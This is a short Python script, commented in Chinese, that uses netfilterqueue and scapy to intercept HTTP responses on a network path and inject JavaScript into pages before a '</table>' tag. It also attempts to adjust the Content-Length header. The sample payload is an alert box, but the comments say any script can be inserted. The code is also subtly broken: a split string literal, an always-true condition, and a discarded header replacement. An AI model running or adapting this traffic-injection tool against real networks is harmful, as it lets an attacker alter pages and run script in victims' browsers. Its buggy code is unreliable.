import netfilterqueue
from scapy.all import *
import re


def modify_payload(scapy_packet,load_change):
    scapy_packet[Raw].load = load_change.encode('utf-8')
    del scapy_packet[IP].len
    del scapy_packet[IP].chksum
    del scapy_packet[TCP].chksum
    return scapy_packet



def packet_handler(pkt):
    
 
#Convert pkt to packet in the format of scapy to process and analyze
    scapy_packet = IP(pkt.get_payload())
    if scapy_packet.haslayer(Raw) and scapy_packet.haslayer(TCP):
        if scapy_packet[TCP].dport == 80:
            print("This is Request.................")
            # print(scapy_packet.show())
 



        elif scapy_packet[TCP].sport == 80:

            load = scapy_packet[Raw].load.decode('utf-8')           
            java_script = '<script>alert("hi, jason")</script>'                      #插入任何Javascript程式碼
            modified_load = load.replace("</table>", java_script+"
 
</table>")         #選擇Javascript程式碼插入的地方，比如</body>前面，但是我測試的這個網站比較奇葩，沒有</body>標籤

            content_length_search = re.search(r'(?:Content-Length:\s)(\d*)', load)  #對於有Content-lengh欄位的響應報文需要修改（並不是所有返回的響應報文都有這個欄位）
            if content_length_search and 'text/html':
                content_length = content_length_search.group(1)
                print("Length of content is : %s" % content_length)
                new_content_length = int(content_length)+len(java_script)
                modified_load.replace(content_length, str(new_content_length))
            scapy_packet = modify_payload(scapy_packet, modified_load)

            pkt.set_payload(bytes(scapy_packet))


   
    pkt.accept()


queue = netfilterqueue.NetfilterQueue()
queue.bind(0, packet_handler)
queue.run()